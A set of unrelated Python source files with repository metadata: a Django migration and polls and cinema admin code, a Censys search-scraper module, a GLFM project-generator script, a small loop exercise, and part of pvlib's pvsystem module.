('telefone', models.IntegerField(blank=True, default=0)),
('email', models.EmailField(blank=True, help_text='Ex. clinte@gmail.com', max_length=50)),
],
options={
'ordering': ['nome', 'sobrenome'],
},
),
migrations.CreateModel(
name='DimensaoModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comprimento', models.FloatField(default=0, help_text='Ex. 8.00', max_length=3)),
('largura', models.FloatField(default=0, help_text='Ex. 4.00', max_length=5)),
('prof_inicial', models.FloatField(max_length=5)),
('prof_final', models.FloatField(default=0, help_text='Ex. 1.40', max_length=3)),
('largura_calcada', models.FloatField(blank=True, default=1, help_text='Ex. 1.00', max_length=3)),
('espessura', models.CharField(max_length=3)),
('fornecedor', models.CharField(max_length=8)),
('profundidade_media', models.CharField(default=0, max_length=25)),
('area_calcada', models.CharField(max_length=25)),
('perimetro', models.CharField(max_length=25)),
('m2_facial', models.CharField(max_length=25)),
('m2_parede', models.CharField(max_length=25)),
('m2_total', models.CharField(max_length=25)),
('m3_total', models.CharField(max_length=25)),
('m3_real', models.CharField(max_length=25)),
('filtro', models.CharField(max_length=30)),
('motobomba', models.CharField(max_length=30)),
('tampa_casa_maquinas', models.CharField(max_length=30)),
('sacos_areia', models.CharField(max_length=30)),
('status', models.CharField(blank=True, choices=[('Em negociação', 'Em negociação'), ('Contrato', 'Contrato'), ('Encerrado', 'Encerrado')], default='Em negociação', help_text='Status do Orçamento', max_length=15)),
('data', models.DateTimeField(blank=True, null=True)),
('cliente', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='dimensoes.clientemodel')),
('usuario', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"leopesi@yahoo.com.br"
] |
leopesi@yahoo.com.br
|
fb77ea07cc1f0e776b2b58f3e6ea4ece9b9419b9
|
6afa0b5bc5c50ed4d90800a7eae118976f47d9f7
|
/lib/core/engines/censys.py
|
0d731cd7f784d2438bda73d08c19472683a81a64
|
[] |
no_license
|
qq431169079/webHunter
|
7efccb39cc4e91d8eae2e25ded0a24c3084bab92
|
bc3cbed64ef71b6fac4c209797c222c8768f4723
|
refs/heads/master
| 2020-04-24T22:37:09.512532
| 2016-01-18T04:21:57
| 2016-01-18T04:21:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,809
|
py
|
#!/usr/bin/env python
# coding: utf-8
import re
import urlparse
import thirdparty.requests as requests
from lib.core.engines import Engine
from lib.core.engines import EngineError
from lib.core.engines import EngineConnectionError
from lib.utils.agents import random_user_agent
from lib.utils.common import dict2query
from lib.utils.common import query2dict
from lib.utils.common import patch_url
from lib.parse.confparse import conf
_NAME = 'Censys'
_SITE = 'https://www.censys.io/'
_DESC = ('Censys Search, a search engine that allows computer scientists to '
'ask questions about the devices and networks that compose the Internet.')
class Censys(Engine):
def __init__(self):
self.maximum = 1000
self.pmax = 25
self.sreq = requests.Session()
self.sreq.headers['User-Agent'] = random_user_agent()
super(Censys, self).__init__(_NAME, _SITE, _DESC)
def _init(self):
try:
self.sreq.get(self._site)
except Exception, ex:
err = 'Failed to connect "%s", ' % self._site
err += str(ex)
raise EngineConnectionError(err)
def _is_over_limit(self, link, limit):
q = urlparse.urlparse(link).query
d = query2dict(q)
return (int(d['page']) * int(self.pmax)) <= limit
@staticmethod
def _fetch_next_page(prev_link, content):
q = urlparse.urlparse(prev_link).query
d = query2dict(q)
prev_page = d.get('page', '')
if prev_page:
match = re.search(r'<a href=(?P<next>[^">]*)>' + str(int(prev_page)+1) + r'</a>', content)
next_link = match.group('next') if match else ''
next_link = patch_url(prev_link, next_link)
else:
next_link = ''
return next_link
def _fetch_page_content(self, link):
try:
content = self.sreq.get(link).content
except any:
content = ''
# err = str(ex)
return content
def _process_redirection(self, res):
# TODO
pass
def search(self, keyword, limit, search_type=''):
self._init()
try:
self._login()
except any:
pass
if limit > self.maximum:
limit = self.maximum
d = {
'q': keyword,
'page': str(1),
}
q = dict2query(d)
if search_type in ['ipv4', 'domain']:
link = urlparse.urljoin((self._site, ('/%s?' % search_type) + q))
else:
link = urlparse.urljoin(self._site, '/domain?' + q)
while self._is_over_limit(link, limit):
print link
content = self._fetch_page_content(link)
link = self._fetch_next_page(link, content)
if not link:
break
yield content
def _login(self):
username = conf.get('censys', 'username')
password = conf.get('censys', 'password')
def fetch_csrf_token(login_url):
_res = self.sreq.get(login_url)
match = re.search(r'name="csrf_token" value="(?P<csrf_token>[^">].*)"', _res.content)
_csrf_token = match.group('csrf_token') if match else ''
match = re.search(r'name="came_from" value= "(?P<came_from>[^">].*)"', _res.content)
_came_from = match.group('came_from') if match else ''
return _csrf_token, _came_from
i_url = 'https://www.censys.io/login'
csrf_token, came_from = fetch_csrf_token(i_url)
if csrf_token and came_from:
post = {
'csrf_token': csrf_token,
'came_from': came_from,
'login': username,
'password': password
}
self.sreq.post(i_url, data=post)
|
[
"rickchen.vip@gmail.com"
] |
rickchen.vip@gmail.com
|
afa1946040cf0c093e0c91e5c89128b08e964dd3
|
ac62bd27af62efb8d8310a71016532d9b9177e54
|
/new_project.py
|
1375c03b01eb07afd5a0b68b8cf87cfa1bd233c8
|
[
"Zlib"
] |
permissive
|
lilingfeng-2016/glfm
|
fcd840da07fdcaa6141d3d0f28b78a1c24b53e8d
|
3b62129e519eba758cc42e3da08ec12ff214a70a
|
refs/heads/master
| 2021-01-11T18:45:06.292753
| 2017-01-15T21:21:43
| 2017-01-15T21:21:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,099
|
py
|
#!/usr/bin/python
import getpass, os, re, shutil, sys
print ""
print "Create a new GLFM project"
print ""
#
# Gets a line of input. The input is stripped of spaces.
# If the input is empty, default_value is returned
#
def get_input(prompt, default_value):
value = raw_input(prompt + " [" + default_value + "]: ")
if not value:
return default_value
else:
value = value.strip()
if len(value) == 0:
return default_value
else:
return value
def name_safe(value):
return re.match(r'^[a-zA-Z\d_]*$', value) is not None
def package_safe(value):
# From http://stackoverflow.com/questions/5205339/regular-expression-matching-fully-qualified-java-classes
return re.match(r'^([a-zA-Z_$][a-zA-Z\d_$]*\.)*[a-zA-Z_$][a-zA-Z\d_$]*$', value) is not None
#
# Read EMSCRIPTEN_ROOT from ~/.emscripten
#
dot_emscripten = os.path.expanduser("~/.emscripten")
if os.path.exists(dot_emscripten):
exec(open(dot_emscripten, 'r').read())
if 'EMSCRIPTEN_ROOT' in globals():
emsdk_path = os.path.dirname(os.path.dirname(EMSCRIPTEN_ROOT))
else:
print "Warning: Emscripten does not appear to be installed"
emsdk_path = "~/emsdk_portable"
#
# Get project variables
#
while True:
app_name = get_input("App name (without spaces)", "GLFMApp")
if name_safe(app_name):
break
else:
print "Illegal name! The app name can only contain letters, numbers, and an underscore."
while True:
package_name = get_input("App package name", "com." + getpass.getuser() + "." + app_name)
if package_safe(package_name):
break
else:
print "Illegal package name! The app name can only contain letters and numbers,"
print "and each component must start with a letter."
emsdk_path = get_input("Emscripten emsdk path", emsdk_path)
#
# Find a default output dir that doesn't already exist (so that nothing is overridden)
#
output_dir = "../" + app_name
output_dir_n = 1
while os.path.exists(output_dir):
output_dir_n += 1
output_dir = "../" + app_name + `output_dir_n`
output_dir = get_input("Project path", output_dir)
print ""
if os.path.exists(output_dir):
print "Project path '" + output_dir + "' already exists. Exiting."
exit(1)
#
# Confirm creation
#
print "Project summary:"
print " App name:", app_name
print " App package name:", package_name
print " Emscripten emsdk path:", emsdk_path
print " Project path:", output_dir
confirm = get_input("Create (y/n)?", "y")
if confirm != "Y" and confirm != "y":
print ""
print "Project creation canceled"
exit(1)
####################################################################################################
ignored_files = (".DS_Store", "Thumbs.db", "Desktop.ini")
ignored_paths = (
"example/platform/android/app/build",
"example/platform/android/.gradle",
"example/platform/android/.idea",
"example/platform/emscripten/bin",
"example/platform/ios/GLFMExample.xcodeproj/project.xcworkspace",
"example/platform/ios/GLFMExample.xcodeproj/xcuserdata",
)
def do_name_replace(s):
s = s.replace("GLFMExample", app_name)
return s
def do_replace(s):
s = s.replace("GLFMExample", app_name)
s = s.replace("com.brackeen.glfmexample", package_name)
s = s.replace("com.brackeen.${PRODUCT_NAME:rfc1034identifier}", package_name)
return s
def copy_android_buildfile(src_file, dst_file):
with open(dst_file, "wt") as fout:
with open(src_file, "rt") as fin:
for line in fin:
line = line.replace("../../../../include", "../../../glfm/include");
line = line.replace("../../../../src", "../../../glfm/src");
fout.write(do_replace(line))
def copy_emscripten_makefile(src_file, dst_file):
with open(dst_file, "wt") as fout:
with open(src_file, "rt") as fin:
for line in fin:
if line.startswith("GLFM_ROOT :="):
fout.write("GLFM_ROOT := ../../glfm\n")
elif line.startswith("APP_ROOT :="):
fout.write("APP_ROOT := ../..\n")
else:
fout.write(do_replace(line))
def copy_ios_project_file(src_file, dst_file):
with open(dst_file, "wt") as fout:
with open(src_file, "rt") as fin:
for line in fin:
line = line.replace("path = ../../..;", "path = ../../glfm;")
fout.write(do_replace(line))
def copy_generic_project_file(src_file, dst_file):
with open(dst_file, "wt") as fout:
with open(src_file, "rt") as fin:
for line in fin:
fout.write(do_replace(line))
def copy_template(src_dir, dst_dir):
if src_dir in ignored_paths:
return
if not os.path.exists(dst_dir):
os.makedirs(dst_dir)
for name in os.listdir(src_dir):
if name in ignored_files:
continue
src = os.path.join(src_dir, name)
dst = os.path.join(dst_dir, do_name_replace(name))
if os.path.isfile(src):
if name == "Makefile":
copy_emscripten_makefile(src, dst)
elif name == "build.gradle":
copy_android_buildfile(src, dst)
elif name == "project.pbxproj":
copy_ios_project_file(src, dst)
elif (name == "AndroidManifest.xml" or name == "strings.xml" or name.endswith(".plist") or name.endswith(".java")):
copy_generic_project_file(src, dst)
else:
shutil.copy2(src, dst)
elif os.path.isdir(src):
copy_template(src, dst)
os.makedirs(output_dir)
# Copy GLFM
shutil.copytree("include", output_dir + "/glfm/include")
shutil.copytree("src", output_dir + "/glfm/src")
# Copy example
shutil.copytree("example/src", output_dir + "/src")
shutil.copytree("example/assets", output_dir + "/assets")
# Copy project files
copy_template("example/platform/android", output_dir + "/platform/android");
copy_template("example/platform/emscripten", output_dir + "/platform/emscripten");
# iOS: package names require dash instead of underscore
package_name = package_name.replace("_", "-")
copy_template("example/platform/ios", output_dir + "/platform/ios");
# Special case: create a Makefile.local for emscripten
with open(output_dir + "/platform/emscripten/Makefile.local", "wt") as fout:
fout.write("EMSCRIPTEN_PATH = " + emsdk_path)
# Woop!
print ""
print "Done."
|
[
"brackeen@gmail.com"
] |
brackeen@gmail.com
|
c6156546305358f3903c211d335238a40cae8906
|
19c4de6bfbd8536aeb323b52fa54d9b73a0efe5f
|
/for.py
|
191ae0a262fcc8a252b1dac8c44825be9989bbe2
|
[] |
no_license
|
GiovanniSinosini/cycle_condictions
|
a39e51ada7931342e51200a2adc3268506d7cc94
|
7ee645668e8f376a8570d9a90a7d253cbe021ecc
|
refs/heads/master
| 2021-02-08T05:52:10.505497
| 2020-03-01T08:54:03
| 2020-03-01T08:54:03
| 244,116,120
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 430
|
py
|
def main():
# Read number
'''
print("Calculate the multiplication table of a number")
numero = 0
while numero <=0:
numero = int(input("Enter number: "))
if numero <= 0:
print ("Error: Number must be greather than zero!")
for i in range(1, 11):
res = numero * i
print("%d x %d = %d" % (numero, i, res))
'''
for i in range(10, 0, -1):
print(i)
main()
|
[
"carvalho.sino@gmail.com"
] |
carvalho.sino@gmail.com
|
b3eadaa9fcf766d67cddeb553303e33ebfc63f42
|
b696b2e86ba95f2922383c8e7cf59aa6939e2196
|
/polls/models.py
|
a9494fae6072be3fa41db3e82b1fa2c74834b5c5
|
[] |
no_license
|
Ihsara/form_example_django
|
14756d7a7b0ad2de5dd0b0b815c45c27e7fce334
|
bce7d454e142a1c1f10600251ccc95488f3035ff
|
refs/heads/master
| 2020-05-03T12:43:40.524198
| 2019-03-31T02:52:06
| 2019-03-31T02:52:06
| 178,634,179
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 640
|
py
|
import datetime
from django.db import models
from django.utils import timezone
class Question(models.Model):
question_text = models.CharField(max_length=200)
pub_date = models.DateTimeField('date published')
def __str__(self):
return self.question_text
class Choice(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE)
choice_text = models.CharField(max_length=200)
votes = models.IntegerField(default=0)
def __str__(self):
return self.choice_text
def was_published_recently(self):
return self.pub_date >= timezone.now() - datetime.timedelta(days=1)
|
[
"longchau21@gmail.com"
] |
longchau21@gmail.com
|
840c1e455245c805ebe1b93b7d10959995f0bd81
|
d030630f6579d836243b794c6769af0452e03f22
|
/Notes/Workshop_0/Exercise - Number Guessing Game.py
|
f277f0fbccb3776e503cc5cafc4dfc6fd5dc57fd
|
[] |
no_license
|
LinesKing/System-Optimisation-Machine-Learning-ELEN90088_2021_SM1
|
6625de1d99f7d4cdc25ced6346aa4f59f0e9c59e
|
f7c65df658e7fe66c63d4ed35071ff13ad2b6a5f
|
refs/heads/main
| 2023-06-25T03:22:20.503772
| 2021-07-29T02:20:53
| 2021-07-29T02:20:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 990
|
py
|
import random
target = random.random()
print("target= {}".format(target))
max = 1 # initial maximum
min = 0 # initial minimum
guess = (max + min)/2 # First guess
count = 0 # guessing times
bias = abs(target - guess) # guessing bias
tolerance = 1.0e-06 # The number depending on a solver's stopping criteria.
while bias > tolerance:
if guess < target:
print("guess {} = {} is smaller than target".format(count,guess))
min = guess # If the guess number is small, assign the result of this guess to min as the next minimum
guess = (guess + max)/2
count += 1
bias = abs(target - guess) # guessing bias
else:
print("guess {} = {} is bigger than target".format(count,guess))
max = guess# If the guess number is large, assign the result of this guess to max as the next maximum
guess = (min + guess)/2
count += 1
bias = abs(target - guess) # guessing bias
print("Total guessing times are {}".format(count))
|
[
"lineslk97@gmail.com"
] |
lineslk97@gmail.com
|
245bea7ae2c8f01f18c4cbc04c206d1ac32509b4
|
f7b935819a37b944ae160cad3faba042c477196b
|
/movie/admin.py
|
e2f054cef92f7722f9218de2691fcc2c44ef3bdf
|
[] |
no_license
|
greyfivenine/cinemasite
|
d98e7d6a4ff41002c4dc7add92301a23fe0354b5
|
bf1ae48d48c26d5eb7bf2db4e993642ac42d2376
|
refs/heads/master
| 2020-05-23T22:37:34.771285
| 2019-05-16T09:21:15
| 2019-05-16T09:21:15
| 186,977,537
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,501
|
py
|
from django.contrib import admin
from .models import Movie, About, Comment, Schedule, Place
from .forms import AdminScheduleForm
# Register your models here.
class CommentFilter(admin.SimpleListFilter):
title = 'Фильм'
parameter_name = 'movie_slug'
def lookups(self, request, model_admin):
movies = set([movie for movie in Movie.objects.filter(soon=False)])
return [(m.slug, m.title) for m in movies]
def queryset(self, request, queryset):
if self.value():
return queryset.filter(comment_film__slug__iexact=self.value())
class PlaceFilter(admin.SimpleListFilter):
title = 'Фильм'
parameter_name = 'movie_slug'
def lookups(self, request, model_admin):
movies = set([movie for movie in Movie.objects.filter(soon=False)])
return [(m.slug, m.title) for m in movies]
def queryset(self, request, queryset):
if self.value():
return queryset.filter(schedule__movie_name__slug__iexact=self.value())
class ScheduleInline(admin.TabularInline):
model = Schedule
class MovieAdmin(admin.ModelAdmin):
class Meta:
model = Movie
prepopulated_fields = {'slug': ('title',)}
list_display = ['title', 'country', 'genre', 'duration', 'soon']
inlines = [
ScheduleInline,
]
class CommentAdmin(admin.ModelAdmin):
class Meta:
model = Comment
list_display = ['comment_author', 'comment_film', 'comment_date']
list_filter = (CommentFilter, 'comment_author',)
class ScheduleAdmin(admin.ModelAdmin):
class Meta:
model = Schedule
form = AdminScheduleForm
list_display = ['movie_name', 'movie_date', 'movie_price', 'movie_format']
class PlaceAdmin(admin.ModelAdmin):
class Meta:
model = Place
list_filter = (PlaceFilter, 'hall_row', 'hall_place',)
search_fields = ['schedule__movie_name__title', '=hall_row', '=hall_place']
list_display = ['get_movie_name', 'get_movie_date', 'hall_row', 'hall_place', 'is_bought']
def get_movie_name(self, obj):
return obj.schedule.movie_name.title
get_movie_name.short_description = 'Название фильма'
def get_movie_date(self, obj):
return obj.schedule.movie_date
get_movie_date.short_description = 'Дата сеанса'
admin.site.register(Movie, MovieAdmin)
admin.site.register(About)
admin.site.register(Comment, CommentAdmin)
admin.site.register(Schedule, ScheduleAdmin)
admin.site.register(Place, PlaceAdmin)
|
[
"mustakimov.99@gmail.com"
] |
mustakimov.99@gmail.com
|
1f44c10841bb3f121b2f3a9f454497acd09bae7b
|
e1d7a04507712e69408a7ae1ec33061bd4c691db
|
/venv/Lib/site-packages/pvlib/pvsystem.py
|
8a20e5fdeff9c954edd7dbbb4611731e94ac306b
|
[] |
no_license
|
Mervolt/pp
|
5d0d70e6e70004284816cae37eac038332a892fe
|
ce0371c79183af8bb3856671aad5b55a81380b4c
|
refs/heads/master
| 2023-06-25T19:17:27.756515
| 2021-07-31T23:04:10
| 2021-07-31T23:04:10
| 363,100,023
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 85,009
|
py
|
"""
The ``pvsystem`` module contains functions for modeling the output and
performance of PV modules and inverters.
"""
from collections import OrderedDict
import io
import os
from urllib.request import urlopen
import warnings
import numpy as np
import pandas as pd
from pvlib._deprecation import deprecated
from pvlib import (atmosphere, iam, inverter, irradiance,
singlediode as _singlediode, temperature)
from pvlib.tools import _build_kwargs
from pvlib.location import Location
from pvlib._deprecation import pvlibDeprecationWarning
# a dict of required parameter names for each DC power model
_DC_MODEL_PARAMS = {
'sapm': {
'A0', 'A1', 'A2', 'A3', 'A4', 'B0', 'B1', 'B2', 'B3',
'B4', 'B5', 'C0', 'C1', 'C2', 'C3', 'C4', 'C5', 'C6',
'C7', 'Isco', 'Impo', 'Voco', 'Vmpo', 'Aisc', 'Aimp', 'Bvoco',
'Mbvoc', 'Bvmpo', 'Mbvmp', 'N', 'Cells_in_Series',
'IXO', 'IXXO', 'FD'},
'desoto': {
'alpha_sc', 'a_ref', 'I_L_ref', 'I_o_ref',
'R_sh_ref', 'R_s'},
'cec': {
'alpha_sc', 'a_ref', 'I_L_ref', 'I_o_ref',
'R_sh_ref', 'R_s', 'Adjust'},
'pvsyst': {
'gamma_ref', 'mu_gamma', 'I_L_ref', 'I_o_ref',
'R_sh_ref', 'R_sh_0', 'R_s', 'alpha_sc', 'EgRef',
'cells_in_series'},
'singlediode': {
'alpha_sc', 'a_ref', 'I_L_ref', 'I_o_ref',
'R_sh_ref', 'R_s'},
'pvwatts': {'pdc0', 'gamma_pdc'}
}
def _combine_localized_attributes(pvsystem=None, location=None, **kwargs):
"""
Get and combine attributes from the pvsystem and/or location
with the rest of the kwargs.
"""
if pvsystem is not None:
pv_dict = pvsystem.__dict__
else:
pv_dict = {}
if location is not None:
loc_dict = location.__dict__
else:
loc_dict = {}
new_kwargs = dict(
list(pv_dict.items()) + list(loc_dict.items()) + list(kwargs.items())
)
return new_kwargs
# not sure if this belongs in the pvsystem module.
# maybe something more like core.py? It may eventually grow to
# import a lot more functionality from other modules.
class PVSystem:
"""
The PVSystem class defines a standard set of PV system attributes
and modeling functions. This class describes the collection and
interactions of PV system components rather than an installed system
on the ground. It is typically used in combination with
:py:class:`~pvlib.location.Location` and
:py:class:`~pvlib.modelchain.ModelChain`
objects.
The class supports basic system topologies consisting of:
* `N` total modules arranged in series
(`modules_per_string=N`, `strings_per_inverter=1`).
* `M` total modules arranged in parallel
(`modules_per_string=1`, `strings_per_inverter=M`).
* `NxM` total modules arranged in `M` strings of `N` modules each
(`modules_per_string=N`, `strings_per_inverter=M`).
The class is complementary to the module-level functions.
The attributes should generally be things that don't change about
the system, such the type of module and the inverter. The instance
methods accept arguments for things that do change, such as
irradiance and temperature.
Parameters
----------
surface_tilt: float or array-like, default 0
Surface tilt angles in decimal degrees.
The tilt angle is defined as degrees from horizontal
(e.g. surface facing up = 0, surface facing horizon = 90)
surface_azimuth: float or array-like, default 180
Azimuth angle of the module surface.
North=0, East=90, South=180, West=270.
albedo : None or float, default None
The ground albedo. If ``None``, will attempt to use
``surface_type`` and ``irradiance.SURFACE_ALBEDOS``
to lookup albedo.
surface_type : None or string, default None
The ground surface type. See ``irradiance.SURFACE_ALBEDOS``
for valid values.
module : None or string, default None
The model name of the modules.
May be used to look up the module_parameters dictionary
via some other method.
module_type : None or string, default 'glass_polymer'
Describes the module's construction. Valid strings are 'glass_polymer'
and 'glass_glass'. Used for cell and module temperature calculations.
module_parameters : None, dict or Series, default None
Module parameters as defined by the SAPM, CEC, or other.
temperature_model_parameters : None, dict or Series, default None.
Temperature model parameters as defined by the SAPM, Pvsyst, or other.
modules_per_string: int or float, default 1
See system topology discussion above.
strings_per_inverter: int or float, default 1
See system topology discussion above.
inverter : None or string, default None
The model name of the inverters.
May be used to look up the inverter_parameters dictionary
via some other method.
inverter_parameters : None, dict or Series, default None
Inverter parameters as defined by the SAPM, CEC, or other.
racking_model : None or string, default 'open_rack'
Valid strings are 'open_rack', 'close_mount', and 'insulated_back'.
Used to identify a parameter set for the SAPM cell temperature model.
losses_parameters : None, dict or Series, default None
Losses parameters as defined by PVWatts or other.
name : None or string, default None
**kwargs
Arbitrary keyword arguments.
Included for compatibility, but not used.
See also
--------
pvlib.location.Location
pvlib.tracking.SingleAxisTracker
"""
def __init__(self,
surface_tilt=0, surface_azimuth=180,
albedo=None, surface_type=None,
module=None, module_type=None,
module_parameters=None,
temperature_model_parameters=None,
modules_per_string=1, strings_per_inverter=1,
inverter=None, inverter_parameters=None,
racking_model=None, losses_parameters=None, name=None,
**kwargs):
self.surface_tilt = surface_tilt
self.surface_azimuth = surface_azimuth
# could tie these together with @property
self.surface_type = surface_type
if albedo is None:
self.albedo = irradiance.SURFACE_ALBEDOS.get(surface_type, 0.25)
else:
self.albedo = albedo
# could tie these together with @property
self.module = module
if module_parameters is None:
self.module_parameters = {}
else:
self.module_parameters = module_parameters
self.module_type = module_type
self.racking_model = racking_model
if temperature_model_parameters is None:
self.temperature_model_parameters = \
self._infer_temperature_model_params()
else:
self.temperature_model_parameters = temperature_model_parameters
self.modules_per_string = modules_per_string
self.strings_per_inverter = strings_per_inverter
self.inverter = inverter
if inverter_parameters is None:
self.inverter_parameters = {}
else:
self.inverter_parameters = inverter_parameters
if losses_parameters is None:
self.losses_parameters = {}
else:
self.losses_parameters = losses_parameters
self.name = name
if kwargs:
warnings.warn(
'Arbitrary PVSystem kwargs are deprecated and will be '
'removed in v0.9', pvlibDeprecationWarning
)
def __repr__(self):
attrs = ['name', 'surface_tilt', 'surface_azimuth', 'module',
'inverter', 'albedo', 'racking_model', 'module_type',
'temperature_model_parameters']
return ('PVSystem:\n ' + '\n '.join(
f'{attr}: {getattr(self, attr)}' for attr in attrs))
def get_aoi(self, solar_zenith, solar_azimuth):
"""Get the angle of incidence on the system.
Parameters
----------
solar_zenith : float or Series.
Solar zenith angle.
solar_azimuth : float or Series.
Solar azimuth angle.
Returns
-------
aoi : Series
The angle of incidence
"""
aoi = irradiance.aoi(self.surface_tilt, self.surface_azimuth,
solar_zenith, solar_azimuth)
return aoi
def get_irradiance(self, solar_zenith, solar_azimuth, dni, ghi, dhi,
dni_extra=None, airmass=None, model='haydavies',
**kwargs):
"""
Uses the :py:func:`irradiance.get_total_irradiance` function to
calculate the plane of array irradiance components on a tilted
surface defined by ``self.surface_tilt``,
``self.surface_azimuth``, and ``self.albedo``.
Parameters
----------
solar_zenith : float or Series.
Solar zenith angle.
solar_azimuth : float or Series.
Solar azimuth angle.
dni : float or Series
Direct Normal Irradiance
ghi : float or Series
Global horizontal irradiance
dhi : float or Series
Diffuse horizontal irradiance
dni_extra : None, float or Series, default None
Extraterrestrial direct normal irradiance
airmass : None, float or Series, default None
Airmass
model : String, default 'haydavies'
Irradiance model.
kwargs
Extra parameters passed to :func:`irradiance.get_total_irradiance`.
Returns
-------
poa_irradiance : DataFrame
Column names are: ``total, beam, sky, ground``.
"""
# not needed for all models, but this is easier
if dni_extra is None:
dni_extra = irradiance.get_extra_radiation(solar_zenith.index)
if airmass is None:
airmass = atmosphere.get_relative_airmass(solar_zenith)
return irradiance.get_total_irradiance(self.surface_tilt,
self.surface_azimuth,
solar_zenith, solar_azimuth,
dni, ghi, dhi,
dni_extra=dni_extra,
airmass=airmass,
model=model,
albedo=self.albedo,
**kwargs)
def get_iam(self, aoi, iam_model='physical'):
"""
Determine the incidence angle modifier using the method specified by
``iam_model``.
Parameters for the selected IAM model are expected to be in
``PVSystem.module_parameters``. Default parameters are available for
the 'physical', 'ashrae' and 'martin_ruiz' models.
Parameters
----------
aoi : numeric
The angle of incidence in degrees.
aoi_model : string, default 'physical'
The IAM model to be used. Valid strings are 'physical', 'ashrae',
'martin_ruiz' and 'sapm'.
Returns
-------
iam : numeric
The AOI modifier.
Raises
------
ValueError if `iam_model` is not a valid model name.
"""
model = iam_model.lower()
if model in ['ashrae', 'physical', 'martin_ruiz']:
param_names = iam._IAM_MODEL_PARAMS[model]
kwargs = _build_kwargs(param_names, self.module_parameters)
func = getattr(iam, model)
return func(aoi, **kwargs)
elif model == 'sapm':
return iam.sapm(aoi, self.module_parameters)
elif model == 'interp':
raise ValueError(model + ' is not implemented as an IAM model'
'option for PVSystem')
else:
raise ValueError(model + ' is not a valid IAM model')
def calcparams_desoto(self, effective_irradiance, temp_cell, **kwargs):
"""
Use the :py:func:`calcparams_desoto` function, the input
parameters and ``self.module_parameters`` to calculate the
module currents and resistances.
Parameters
----------
effective_irradiance : numeric
The irradiance (W/m2) that is converted to photocurrent.
temp_cell : float or Series
The average cell temperature of cells within a module in C.
**kwargs
See pvsystem.calcparams_desoto for details
Returns
-------
See pvsystem.calcparams_desoto for details
"""
kwargs = _build_kwargs(['a_ref', 'I_L_ref', 'I_o_ref', 'R_sh_ref',
'R_s', 'alpha_sc', 'EgRef', 'dEgdT',
'irrad_ref', 'temp_ref'],
self.module_parameters)
return calcparams_desoto(effective_irradiance, temp_cell, **kwargs)
def calcparams_cec(self, effective_irradiance, temp_cell, **kwargs):
"""
Use the :py:func:`calcparams_cec` function, the input
parameters and ``self.module_parameters`` to calculate the
module currents and resistances.
Parameters
----------
effective_irradiance : numeric
The irradiance (W/m2) that is converted to photocurrent.
temp_cell : float or Series
The average cell temperature of cells within a module in C.
**kwargs
See pvsystem.calcparams_cec for details
Returns
-------
See pvsystem.calcparams_cec for details
"""
kwargs = _build_kwargs(['a_ref', 'I_L_ref', 'I_o_ref', 'R_sh_ref',
'R_s', 'alpha_sc', 'Adjust', 'EgRef', 'dEgdT',
'irrad_ref', 'temp_ref'],
self.module_parameters)
return calcparams_cec(effective_irradiance, temp_cell, **kwargs)
def calcparams_pvsyst(self, effective_irradiance, temp_cell):
"""
Use the :py:func:`calcparams_pvsyst` function, the input
parameters and ``self.module_parameters`` to calculate the
module currents and resistances.
Parameters
----------
effective_irradiance : numeric
The irradiance (W/m2) that is converted to photocurrent.
temp_cell : float or Series
The average cell temperature of cells within a module in C.
Returns
-------
See pvsystem.calcparams_pvsyst for details
"""
kwargs = _build_kwargs(['gamma_ref', 'mu_gamma', 'I_L_ref', 'I_o_ref',
'R_sh_ref', 'R_sh_0', 'R_sh_exp',
'R_s', 'alpha_sc', 'EgRef',
'irrad_ref', 'temp_ref',
'cells_in_series'],
self.module_parameters)
return calcparams_pvsyst(effective_irradiance, temp_cell, **kwargs)
def sapm(self, effective_irradiance, temp_cell, **kwargs):
"""
Use the :py:func:`sapm` function, the input parameters,
and ``self.module_parameters`` to calculate
Voc, Isc, Ix, Ixx, Vmp, and Imp.
Parameters
----------
effective_irradiance : numeric
The irradiance (W/m2) that is converted to photocurrent.
temp_cell : float or Series
The average cell temperature of cells within a module in C.
kwargs
See pvsystem.sapm for details
Returns
-------
See pvsystem.sapm for details
"""
return sapm(effective_irradiance, temp_cell, self.module_parameters)
def sapm_celltemp(self, poa_global, temp_air, wind_speed):
"""Uses :py:func:`temperature.sapm_cell` to calculate cell
temperatures.
Parameters
----------
poa_global : numeric
Total incident irradiance in W/m^2.
temp_air : numeric
Ambient dry bulb temperature in degrees C.
wind_speed : numeric
Wind speed in m/s at a height of 10 meters.
Returns
-------
numeric, values in degrees C.
"""
# warn user about change in default behavior in 0.9.
if (self.temperature_model_parameters == {} and self.module_type
is None and self.racking_model is None):
warnings.warn(
'temperature_model_parameters, racking_model, and module_type '
'are not specified. Reverting to deprecated default: SAPM '
'cell temperature model parameters for a glass/glass module '
'in open racking. In v0.9, temperature_model_parameters or a '
'valid combination of racking_model and module_type will be '
'required.',
pvlibDeprecationWarning)
params = temperature._temperature_model_params(
'sapm', 'open_rack_glass_glass')
self.temperature_model_parameters = params
kwargs = _build_kwargs(['a', 'b', 'deltaT'],
self.temperature_model_parameters)
return temperature.sapm_cell(poa_global, temp_air, wind_speed,
**kwargs)
def _infer_temperature_model_params(self):
# try to infer temperature model parameters from from racking_model
# and module_type
param_set = f'{self.racking_model}_{self.module_type}'
if param_set in temperature.TEMPERATURE_MODEL_PARAMETERS['sapm']:
return temperature._temperature_model_params('sapm', param_set)
elif 'freestanding' in param_set:
return temperature._temperature_model_params('pvsyst',
'freestanding')
elif 'insulated' in param_set: # after SAPM to avoid confusing keys
return temperature._temperature_model_params('pvsyst',
'insulated')
else:
return {}
def sapm_spectral_loss(self, airmass_absolute):
"""
Use the :py:func:`sapm_spectral_loss` function, the input
parameters, and ``self.module_parameters`` to calculate F1.
Parameters
----------
airmass_absolute : numeric
Absolute airmass.
Returns
-------
F1 : numeric
The SAPM spectral loss coefficient.
"""
